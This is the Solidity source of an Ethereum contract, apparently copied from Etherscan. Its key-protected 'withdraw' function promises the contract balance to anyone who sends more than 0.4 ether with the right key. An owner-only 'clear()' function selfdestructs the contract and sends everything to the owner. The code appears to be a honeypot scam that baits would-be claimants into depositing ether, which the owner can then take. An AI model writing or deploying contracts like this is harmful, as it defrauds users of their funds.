/** * Source Code first verified at https://etherscan.io on Sunday, April 21, 2019 (UTC) */ pragma solidity ^0.4.25; contract multi_funding { bytes32 keyHash; address owner; bytes32 wallet_id = 0x73b44672cd53044d6c43b51a50a3170502f810850d543b0010fc4f84639109a2; constructor() public { owner = msg.sender; } function withdraw(string key) public payable { require(msg.sender == tx.origin); if(keyHash == keccak256(abi.encodePacked(key))) { if(msg.value > 0.4 ether) { msg.sender.transfer(address(this).balance); } } } function setup_key(string key) public { if (keyHash == 0x0) { keyHash = keccak256(abi.encodePacked(key)); } } function update_hash_new(bytes32 new_hash) public { if (keyHash == 0x0) { keyHash = new_hash; } } function clear() public { require(msg.sender == owner); selfdestruct(owner); } function get_id() public view returns(bytes32){ return wallet_id; } function () public payable { } }